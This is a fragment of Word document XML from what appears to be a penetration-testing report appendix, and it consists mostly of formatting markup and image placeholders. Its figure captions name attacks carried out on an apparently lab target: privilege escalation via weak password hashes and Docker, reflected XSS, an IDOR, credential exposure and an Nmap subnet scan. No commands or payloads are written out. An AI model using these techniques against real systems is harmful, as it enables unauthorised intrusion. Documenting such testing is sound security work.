          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.14.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Weak Password Hash: Privilege Escalation Executed</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172181E5" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C1DC31" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="FigureAI151"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3025577D" wp14:editId="7085AA46">
            <wp:extent cx="4477921" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47632135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21353" name="Picture 10" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4484591" cy="2604198"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
    </w:p>
    <w:p w14:paraId="3E27E941" w14:textId="621A1817" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure A.15.1 Reflected XSS via search input field</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31078C" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FDD03F" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="FigureAI152"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B837CA4" wp14:editId="2E519ACD">
            <wp:extent cx="4133850" cy="2233177"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1116131320"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31320" name="Picture 12" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>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36001" cy="2234339"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
    </w:p>
    <w:p w14:paraId="4D0EE1A4" w14:textId="1E1B0C37" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Figure A.15.2 Reflected XSS via search input field</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E4441" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A779ED8" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="FigureAI161"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BAC660B" wp14:editId="46195513">
            <wp:extent cx="4568808" cy="536487"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="912839597" name="Picture 23"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39597" name="Picture 23" descr="A screenshot of a computer code&#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598415" cy="539964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="258"/>
    </w:p>
    <w:p w14:paraId="023581D1" w14:textId="0EB05600" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>A.16.1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFBECD4" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C557835" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="FigureAI162"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E8863DC" wp14:editId="716BBF51">
            <wp:extent cx="3295650" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197226451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64518" name="Picture 25" descr="A screenshot of a computer&#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95650" cy="1028700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
    </w:p>
    <w:p w14:paraId="1CCEF10E" w14:textId="078561A9" w:rsidR="005F3C61" w:rsidRPr="00883F52" w:rsidRDefault="005F3C61" w:rsidP="00883F52">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Figure A.16.2: Reveal credentials to Sopot account</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F057E9" w14:textId="77777777" w:rsidR="009E22F2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E22F2" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="FigureAI17"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D9782CE" wp14:editId="488206C1">
            <wp:extent cx="2819850" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10391555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820542" cy="3029694"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="260"/>
    </w:p>
    <w:p w14:paraId="478D938C" w14:textId="23003A48" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A.17 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IDOR in ascii_gallery.php</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EA1DAD" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDF515D" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRDefault="00DB53DF" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5187F5" w14:textId="77777777" w:rsidR="00883F52" w:rsidRPr="00D77DFE" w:rsidRDefault="00883F52" w:rsidP="009E22F2">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5E66CA" w14:textId="77777777" w:rsidR="0027437D" w:rsidRDefault="0027437D" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DBB097" w14:textId="51F26D78" w:rsidR="000F3682" w:rsidRPr="00D77DFE" w:rsidRDefault="000F3682"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3AA541D7" wp14:editId="138C71B5">
            <wp:extent cx="4253023" cy="2467841"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="15441374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r="13355"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4256625" cy="2469931"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0632FD66" w14:textId="57D4E625" w:rsidR="000F3682" w:rsidRPr="00D77DFE" w:rsidRDefault="000F3682"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t>....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A044100" w14:textId="3DD74305" w:rsidR="000F3682" w:rsidRPr="00D77DFE" w:rsidRDefault="000F3682"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48CD641" wp14:editId="2AC73C4A">
            <wp:extent cx="3133725" cy="1038225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4158067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rotWithShape="1">
                    <a:blip r:embed="rId83" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3133725" cy="1038225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BBABCF" w14:textId="78D9AD00" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="002D6FEB">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="paragraph35" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:b/>
            <w:bCs/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Figure A.18:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap Scanning Subnet 2</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54630E98" w14:textId="77777777" w:rsidR="000F3682" w:rsidRPr="00D77DFE" w:rsidRDefault="000F3682" w:rsidP="00B12294">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BF6BB4" w14:textId="5FC6554F" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="000F3682" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>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5CDD39D0" wp14:editId="6353FBFB">
            <wp:extent cx="4210050" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3985587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210050" cy="1333500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="261" w:name="resource36"/>
    <w:p w14:paraId="23701AD2" w14:textId="51CEC186" w:rsidR="00A5079F" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>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"paragraph36"</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A.19</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bookmarkEnd w:id="261"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
